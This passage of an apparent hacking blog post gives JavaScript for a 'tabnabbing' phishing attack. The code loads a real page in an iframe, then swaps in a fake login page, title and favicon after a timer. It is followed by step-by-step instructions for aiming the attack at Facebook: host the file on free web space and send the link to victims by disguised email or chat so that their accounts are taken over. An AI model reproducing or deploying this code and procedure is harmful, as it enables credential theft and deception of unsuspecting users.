//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();

//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
 el_tabnab.onblur = function(){
 TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
 }
 el_tabnab.onfocus= function(){
 if(TIMER) clearTimeout(TIMER);
 }
} else {
 setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}

function TabNabIt(){
 if(SWITCHED == "false"){
 //Redirect the iframe to FAKE_PAGE_URL
 el_tabnab.src=FAKE_PAGE_URL;
 //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
 if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

 //Change the favicon -- This doesn't seem to work in IE
 if(BROWSER_TYPE != "Internet Explorer"){
 var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
 for (var i=0; i<links.length; i++) {
 var looplink = links[i];
 if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
 document.getElementsByTagName("head")[0].removeChild(looplink);
 }
 }
 var link = document.createElement("link");
 link.type = "image/x-icon";
 link.rel = "shortcut icon";
 link.href = FAKE_FAVICON;
 document.getElementsByTagName("head")[0].appendChild(link);
 }
 }
}
</script>

</body>
</html>


Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anything.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..


You can Also See My Older post Fishing Technique  

Related Posts Plugin for WordPress, Blogger...